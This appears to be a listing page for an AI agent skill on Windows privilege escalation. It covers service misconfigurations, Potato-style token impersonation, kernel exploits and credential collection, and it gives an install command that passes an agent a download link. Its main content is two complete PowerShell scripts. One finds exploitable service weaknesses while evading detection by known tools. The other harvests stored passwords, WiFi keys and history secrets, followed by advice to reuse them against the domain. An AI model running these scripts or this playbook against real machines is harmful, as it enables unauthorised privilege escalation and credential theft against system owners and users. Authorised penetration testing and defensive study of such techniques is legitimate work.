Windows Privilege Escalation
This skill should be used when the user asks to "escalate privileges on Windows," "find Windows privesc vectors," "enumerate Windows for privilege escalation," "exploit Windows misconfigurations," or "perform post-exploitation privilege escalation." It provides comprehensive guidance for discovering and exploiting privilege escalation vulnerabilities in Windows environments.
Author
zebbern
Category
Other Tools
Download and extract to your skills directory
Copy command and send to OpenClaw for auto-install:
Download and install this skill https://openskills.cc/api/download?slug=sickn33-skills-windows-privilege-escalation&locale=en&source=copy
Skill Overview
This skill provides a systematic approach to discovering and exploiting privilege escalation vulnerabilities in Windows environments. It covers system enumeration, credential collection, service exploitation, token impersonation, kernel vulnerability exploitation, and abuse of Windows misconfigurations, helping penetration testers escalate from a standard user to Administrator or SYSTEM.
Use Cases
1. Post-Exploitation Phase in Penetration Testing
Use this when you have already obtained a standard user shell or RDP access to the target Windows system and need to escalate privileges to gain greater control. This is a key step in internal network penetration and lateral movement, and also a common privilege escalation scenario in red team operations.
2. Authorized Security Assessments and Red Team Exercises
When conducting authorized security assessments or red team exercises, you need to discover and verify Windows privilege escalation vulnerabilities, assess security risks in the organization’s Windows environment, and provide remediation recommendations and security hardening plans.
3. CTF Competitions and Security Research
In CTF competitions involving Windows challenges, you need to use various Windows privilege escalation techniques to obtain flags. For security research, you should deeply understand the Windows security model and privilege escalation principles to discover new vulnerabilities.
Core Features
1. System Enumeration and Vulnerability Discovery
Provide comprehensive Windows system enumeration methods, including system information collection, user privilege checks, network configuration enumeration, service configuration analysis, and more. Includes commands to invoke professional tools such as WinPEAS, PowerUp, and Seatbelt, helping quickly identify exploitable privilege escalation vectors such as misconfigured services, unquoted paths, and weak permission configurations.
2. Credential Collection and Exploitation
Cover multiple credential collection techniques in Windows environments, including extracting SAM and SYSTEM files, exploiting HiveNightmare (CVE-2021-36934), searching for registry-stored passwords, extracting credentials from Unattend.xml, retrieving WiFi passwords, analyzing PowerShell history, and more—helping uncover hard-coded credentials and sensitive information in the system.
3. Service and Token Exploitation
Provide Windows service exploitation methods, including modifying service permissions, exploiting unquoted service paths, and exploiting AlwaysInstallElevated vulnerabilities. Explain token impersonation techniques in detail, including the usage scenarios and Windows version compatibility of tools such as JuicyPotato, PrintSpoofer, RoguePotato, and GodPotato, as well as methods for abusing critical privileges such as SeImpersonatePrivilege.
Common Questions
What are common methods for Windows privilege escalation?
Common Windows privilege escalation methods include: exploiting service vulnerabilities (weak permissions, unquoted paths), token impersonation (SeImpersonatePrivilege abuse), kernel exploitation (unpatched CVEs), credential collection (registry, configuration files), DLL hijacking, and misconfiguration exploitation (AlwaysInstallElevated), among others. It is recommended to first use WinPEAS or PowerUp for automated enumeration, then choose the appropriate exploitation method based on the discovered vulnerability vectors.
What is the difference between WinPEAS and PowerUp?
WinPEAS is an all-in-one enumeration tool that checks configurations across the whole system (services, registry, files, credentials, patch level, network) and produces a large, colour-coded report. PowerUp (part of PowerSploit) concentrates on a smaller set of local misconfigurations: service permissions and binaries, unquoted service paths, DLL hijacking paths, writable registry autoruns and AlwaysInstallElevated, so its output is shorter and more precise. In practice, run PowerUp's Invoke-AllChecks first to find service-related issues quickly, then WinPEAS for full coverage. Note that PowerUp is a PowerShell script, whereas WinPEAS ships mainly as a .NET executable (winPEASx64.exe, winPEASx86.exe) with a batch variant (winPEAS.bat); both run directly on the target, so expect AV/EDR to flag them.
How do you use SeImpersonatePrivilege?
SeImpersonatePrivilege (and the related SeAssignPrimaryTokenPrivilege) lets a process impersonate tokens it obtains. Service accounts such as IIS application pool identities and the MSSQL service account hold it by default, so it usually turns up after compromising a web application or database rather than a desktop user. The "Potato" family abuses it by coercing SYSTEM into authenticating to a listener the attacker controls and then impersonating the resulting token. Tool choice depends on the build: JuicyPotato works up to Windows 10 1803 and Server 2016 (the DCOM behaviour it relies on changed in Windows 10 1809 and Server 2019); PrintSpoofer and RoguePotato were written for Windows 10 1809+ and Server 2019, with PrintSpoofer needing the Print Spooler service running and RoguePotato needing an OXID resolver reachable on port 135 through a redirector the attacker controls; GodPotato covers Windows 8/Server 2012 through Windows 11/Server 2022. First run whoami /priv to confirm the privilege is present (it is usable even when listed as Disabled, because the tools enable it themselves), then pick the tool that matches the system version.
What is the principle behind Windows service privilege escalation?
Windows service privilege escalation primarily relies on service configuration mistakes: (1) weak permissions, either on the service object itself (a standard user holding SERVICE_CHANGE_CONFIG can point binPath= at a program of their choice) or on the service binary and its directory (the executable can be overwritten or a DLL it loads can be planted); (2) unquoted service paths containing spaces. If the ImagePath is C:\Program Files\App\service.exe without quotes, Windows resolves it by trying C:\Program.exe, then C:\Program Files\App.exe, and only then the real binary, so a writable directory anywhere on that chain lets you plant a file that runs as the service account (usually SYSTEM). A standard user cannot create files in the root of C:\ on a default install, so the practical case is a writable vendor directory. In both cases you still need a way to restart the service: start/stop rights on it, an autostart service plus a reboot, or a service that restarts on its own. Use accesschk.exe -uwcqv "Authenticated Users" * to check service object permissions, accesschk.exe -uwdqs Users C:\ to find writable directories, and wmic service get name,pathname,startmode (or Get-CimInstance Win32_Service in PowerShell, since wmic is deprecated) to find unquoted paths.
How do you detect Windows privilege escalation vulnerabilities?
Detection methods include: using WinPEAS/PowerUp for automated scanning; manually checking service permissions (accesschk.exe); querying unquoted paths (wmic service or Get-CimInstance Win32_Service); checking privilege assignments (whoami /priv); finding auto-logon credentials in the registry; analysing scheduled task configurations (schtasks /query /fo LIST /v) for tasks that run as SYSTEM from a writable location; and checking kernel patch status (Watson, Windows Exploit Suggester). From a defensive perspective, reduce the risk by restricting service and directory permissions, enabling UAC, applying patches promptly, and monitoring for abnormal child processes of services.
What risks are involved in Windows kernel vulnerability exploitation?
Kernel vulnerability exploitation may crash the system with a blue screen, trigger AV/EDR alerts, and leave obvious log artifacts. It is recommended to prioritise misconfiguration and service vulnerability exploitation, using kernel exploitation only as a last resort. Before using it, confirm the missing patches with Watson or Windows Exploit Suggester, choose an exploit built for that exact build and architecture, validate it in a test environment, and only then run it on the target.
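The service-path and detection answers above describe the manual checks in terms of accesschk and wmic. The following PowerShell script is an added example, not code from the skill, from WinPEAS or from PowerUp: it implements the same three checks (unquoted paths with a writable directory on the resolution chain, writable service binaries, and service objects whose DACL lets the current user reconfigure them) using only built-in cmdlets and sc.exe, so it runs where uploading a known tool would be noisy. The function names and the output format are my own.

```powershell
# Added example (not from the skill, WinPEAS or PowerUp): enumerate the three
# service misconfigurations from a standard-user shell using built-in cmdlets.
# It only reports candidates and changes nothing; confirm each finding by hand,
# and remember that you still need a way to restart the affected service.

$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
# Every SID the current token carries: the user plus its groups (Users, Authenticated Users, ...).
$mySids = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

# File-system rights that let the holder create or overwrite content:
# WriteData/CreateFiles (0x2), GENERIC_WRITE (0x40000000), GENERIC_ALL (0x10000000).
# Modify and FullControl both include bit 0x2, so they are covered as well.
$FileWriteMask = 0x2 -bor 0x40000000 -bor 0x10000000

function Test-AclWritable {
    param([Parameter(Mandatory)][string]$Path)
    # $true when an Allow ACE for one of our SIDs grants write on the object itself
    # and no matching Deny ACE withdraws it. Missing paths and unreadable ACLs are "not writable".
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $allowed = $false
    foreach ($rule in $acl.Access) {
        # PropagationFlags InheritOnly (2): the ACE applies to children, not to this object.
        if (([int]$rule.PropagationFlags -band 2) -ne 0) { continue }
        try { $sid = $rule.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # orphaned or untranslatable SID
        if ($mySids -notcontains $sid) { continue }
        if (([int]$rule.FileSystemRights -band $FileWriteMask) -eq 0) { continue }
        if ($rule.AccessControlType -eq 'Deny') { return $false }
        $allowed = $true
    }
    return $allowed
}

function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory)][string]$PathName)
    # For an unquoted "C:\Program Files\App Dir\svc.exe -arg", CreateProcess tries
    # C:\Program.exe, then C:\Program Files\App.exe, then the real binary.
    # Emit the paths tried before the real one.
    $tokens = $PathName -split ' '
    $candidates = @()
    for ($i = 0; $i -lt $tokens.Count - 1; $i++) {
        $prefix = $tokens[0..$i] -join ' '
        if ($prefix -match '\.exe$') { break }   # reached the real executable
        $candidates += "$prefix.exe"
    }
    $candidates
}

function Get-ServiceBinaryPath {
    param([Parameter(Mandatory)][string]$PathName)
    # Strip quotes and arguments: "C:\x y\a.exe" -s  ->  C:\x y\a.exe
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

# Service-object rights that let the holder reconfigure the service (sc config ... binPath=)
# or rewrite its security descriptor: SERVICE_CHANGE_CONFIG (0x2), WRITE_DAC (0x40000),
# WRITE_OWNER (0x80000), GENERIC_WRITE (0x40000000), GENERIC_ALL (0x10000000).
$ServiceWriteMask = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000

function Test-ServiceConfigWritable {
    param([Parameter(Mandatory)][string]$Name)
    # Parse the SDDL printed by "sc.exe sdshow <name>" (the check accesschk -c automates).
    $sddl = (& sc.exe sdshow $Name 2>$null) | ForEach-Object { $_.Trim() } |
        Where-Object { $_ -match '^D:' } | Select-Object -First 1
    if (-not $sddl) { return $false }
    try { $sd = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $sddl } catch { return $false }
    if (-not $sd.DiscretionaryAcl) { return $false }
    $allowed = $false
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [Security.AccessControl.CommonAce]) { continue }
        if ($mySids -notcontains $ace.SecurityIdentifier.Value) { continue }
        if (($ace.AccessMask -band $ServiceWriteMask) -eq 0) { continue }
        if ($ace.AceQualifier -eq [Security.AccessControl.AceQualifier]::AccessDenied) { return $false }
        $allowed = $true
    }
    return $allowed
}

# Get-CimInstance replaces the deprecated "wmic service get name,pathname,startmode".
$findings = foreach ($svc in Get-CimInstance Win32_Service) {
    $path = $svc.PathName
    if (-not $path) { continue }
    $info = @{ Service = $svc.Name; StartMode = $svc.StartMode; RunsAs = $svc.StartName }
    # 1. Unquoted path: is the directory of any earlier-tried location writable by us?
    if ($path -notmatch '^"') {
        foreach ($cand in (Get-UnquotedPathCandidates $path)) {
            $dir = Split-Path -Parent $cand
            if ($dir -and (Test-AclWritable $dir)) {
                [pscustomobject]($info + @{ Issue = 'UnquotedPath'; Target = $cand })
            }
        }
    }
    # 2. Service binary we can overwrite.
    $bin = Get-ServiceBinaryPath $path
    if (Test-AclWritable $bin) { [pscustomobject]($info + @{ Issue = 'WritableBinary'; Target = $bin }) }
    # 3. Service object whose configuration we can change.
    if (Test-ServiceConfigWritable $svc.Name) { [pscustomobject]($info + @{ Issue = 'WritableServiceConfig'; Target = $svc.Name }) }
}
$findings | Format-Table Service, Issue, Target, StartMode, RunsAs -AutoSize
```

Run it in the shell you already have. A finding is only exploitable together with a restart path: sc.exe start works when the service DACL grants the start right (RP in the SDDL), otherwise an Auto start mode plus a reboot, or a service that restarts on failure, is needed. The RunsAs column tells you what you get; LocalSystem is the usual target.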
What permissions are needed for Windows privilege escalation?
Most Windows privilege escalation techniques start from a standard user shell. The exceptions are specific: kernel exploits depend on the exact Windows build and patch level; service exploits require a way to restart the service (start/stop rights on it, a reboot of an autostart service, or a service that restarts itself); and token impersonation requires SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, which standard users lack and service accounts (IIS, MSSQL) usually hold. In actual penetration testing, the shell gained during initial access is usually sufficient to start privilege escalation enumeration and exploitation.
What methods are used for Windows credential collection?
Windows credential collection methods include: exporting the SAM and SYSTEM hives (reg save, which needs admin rights, or copies found in backups and shadow copies) and extracting hashes with Mimikatz or secretsdump; exploiting HiveNightmare to read the hives from a volume shadow copy as a standard user on unpatched builds; searching the registry for passwords (Winlogon auto-logon, PuTTY sessions, VNC); extracting credentials from Unattend.xml and Sysprep answer files; dumping saved WiFi keys with netsh wlan show profile ... key=clear; reading PSReadLine's ConsoleHost_history.txt; checking saved browser passwords; and listing saved RDP credentials in Credential Manager (cmdkey /list; the stored secrets are DPAPI-protected and need that user's context or Mimikatz to decrypt), among others.
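The registry, file and history sources in the answer above can all be read without admin rights. The PowerShell script below is an added example, not code from the skill: it collects Winlogon auto-logon passwords, PuTTY proxy passwords, Unattend.xml/Sysprep passwords (decoding the base64 form), PSReadLine history lines that look like secrets, and saved WiFi keys, and prints them as one table. SAM/SYSTEM extraction and HiveNightmare are left out because they need admin rights or a specific unpatched build. The function names, the search pattern and the file list are my own choices, and the netsh parsing assumes English-language output.

```powershell
# Added example (not from the skill): read-only credential hunting from a standard-user shell.
# Each function emits objects with Source, Context, Secret and Location so results can be
# combined; nothing is modified on the host.

function Get-AutoLogonCredential {
    # Winlogon auto-logon keeps the password in cleartext when set up via the registry.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $v = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if ($v -and $v.DefaultPassword) {
        [pscustomobject]@{ Source = 'AutoLogon'; Context = "$($v.DefaultDomainName)\$($v.DefaultUserName)"
                           Secret = $v.DefaultPassword; Location = $key }
    }
}

function Get-PuttySessionCredential {
    # PuTTY stores per-session proxy credentials under HKCU; host and user names are useful on their own.
    $base = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
    Get-ChildItem -Path $base -ErrorAction SilentlyContinue | ForEach-Object {
        $s = Get-ItemProperty -Path $_.PSPath
        if ($s.ProxyPassword) {
            [pscustomobject]@{ Source = 'PuTTY'; Context = "$($s.ProxyUsername)@$($s.HostName)"
                               Secret = $s.ProxyPassword; Location = $_.PSPath }
        }
    }
}

function Get-UnattendCredential {
    # Setup answer files often keep the local Administrator or auto-logon password. The
    # PlainText=false form is only base64 of the UTF-16LE password with "Password" appended.
    $files = @("$env:SystemRoot\Panther\Unattend.xml", "$env:SystemRoot\Panther\Unattend\Unattend.xml",
               "$env:SystemRoot\System32\Sysprep\Sysprep.xml", "$env:SystemRoot\System32\Sysprep\Unattend.xml",
               "$env:SystemDrive\Unattend.xml")
    foreach ($f in ($files | Where-Object { Test-Path -LiteralPath $_ })) {
        try { [xml]$doc = Get-Content -LiteralPath $f -Raw -ErrorAction Stop } catch { continue }
        # local-name() sidesteps the urn:schemas-microsoft-com:unattend default namespace.
        foreach ($node in $doc.SelectNodes("//*[local-name()='Password']")) {
            $valueNode = $node.SelectSingleNode("*[local-name()='Value']")
            if (-not $valueNode -or -not $valueNode.InnerText) { continue }
            $plainNode = $node.SelectSingleNode("*[local-name()='PlainText']")
            $isPlain = (-not $plainNode) -or ($plainNode.InnerText -eq 'true')
            $secret = if ($isPlain) { $valueNode.InnerText } else {
                try { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($valueNode.InnerText)) -replace 'Password$', '' }
                catch { $valueNode.InnerText }
            }
            [pscustomobject]@{ Source = 'Unattend'; Context = $node.ParentNode.LocalName; Secret = $secret; Location = $f }
        }
    }
}

function Get-PowerShellHistoryHit {
    # PSReadLine writes every interactive command line to disk; other users' files are
    # usually unreadable, but the wildcard costs nothing when they are not.
    $pattern = 'password|passwd|pwd|secret|token|-AsPlainText|net use|cmdkey|ConvertTo-SecureString'
    $paths = Get-ChildItem -Path "$env:SystemDrive\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -ErrorAction SilentlyContinue
    foreach ($p in $paths) {
        Select-String -Path $p.FullName -Pattern $pattern -ErrorAction SilentlyContinue | ForEach-Object {
            [pscustomobject]@{ Source = 'PSHistory'; Context = "line $($_.LineNumber)"; Secret = $_.Line.Trim(); Location = $p.FullName }
        }
    }
}

function Get-WifiKey {
    # netsh prints the PSK of saved profiles; the regexes match English output only,
    # and Key Content is empty when the profile is not readable by the current user.
    $profiles = netsh wlan show profiles | ForEach-Object {
        if ($_ -match '^\s*All User Profile\s*:\s*(.+?)\s*$') { $Matches[1] }
    }
    foreach ($name in $profiles) {
        $key = netsh wlan show profile name="$name" key=clear | ForEach-Object {
            if ($_ -match '^\s*Key Content\s*:\s*(.+?)\s*$') { $Matches[1] }
        }
        if ($key) { [pscustomobject]@{ Source = 'WiFi'; Context = $name; Secret = $key; Location = 'netsh wlan' } }
    }
}

$hits = @(Get-AutoLogonCredential) + @(Get-PuttySessionCredential) + @(Get-UnattendCredential) +
        @(Get-PowerShellHistoryHit) + @(Get-WifiKey)
$hits | Format-Table Source, Context, Secret, Location -AutoSize -Wrap
```

Anything found here should be tried against local accounts (runas, or a new logon over RDP/WinRM) and against the domain, since admins reuse passwords between answer files, auto-logon and their own accounts; a hit in PSReadLine history is just a line to read, not a guaranteed secret, so review it before acting on it.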